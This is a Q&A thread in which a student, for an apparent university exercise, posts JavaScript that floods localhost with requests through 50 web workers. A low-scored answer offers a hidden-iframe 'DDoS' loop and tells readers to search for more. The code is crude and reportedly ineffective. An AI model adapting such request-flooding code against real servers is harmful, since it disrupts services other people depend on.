# JavaScript DoS attack using WebWorkers

Tags: javascript, xmlhttprequest, web-worker, denial-of-service

at the university we got sort of a "homework" to try to execute denial of service attack. I have decided to go a little bit different way then oters. I tried to execute it using JavaScript.

**The questions are:**

- Is it even possible to to this?
- If I do HttpRequest on loopback will I see the result by unaccesibility of any web sites caused by overflowing http port?
- Is there better code to do this than mine?

**index.html:**

```
<script>
    for(var i = 0; i< 50; i++) {
        worker = new Worker("worker.js");
        worker.postMessage('Hello World');
    }
</script>
```

**worker.js:**

```
self.addEventListener('message', function(e) {
    while(1) {
            var xmlHttp = new XMLHttpRequest();
            xmlHttp.onreadystatechange = function() { 
            if (xmlHttp.readyState == 4 && xmlHttp.status == 200)
                    callback(xmlHttp.responseText);
            }
            xmlHttp.open("GET", "http://127.0.0.1", true);
            xmlHttp.send(null);
    }
}, false);
```

Thank you for any input!

Comment: I'm not sure but that is more likely to crash your own computer than remote server (if you choose other than localhost) `while(1)`

Comment: What happened when you ran the code shown? Was the browser cool with the `while(1)`?

Comment: @nnnnnn The browser seemed to be fine since web workers did everything behind the scene. In developer tool you could clearly see that requests are being sent, however i could go to whatever website I wanted with no problem whatsoever.

Comment: This belongs either on codereview.stackexchange.com or security.stackexchange.com.

Comment: Huh? What about CORS?

Answer (score -1):

So first of all if I could improve this code i would use a setInterval instead of while(1). Secondly, I found a much simpler version here:

```
function _DDoS(url){
    document.body.innerHTML+='<iframe src="'+url+'" style="display:none;">   </iframe>';
}
for(;;){
 setTimeout(_DDoS("http://localhost"),10);
}
```

just search javascript ddos and you will find many examples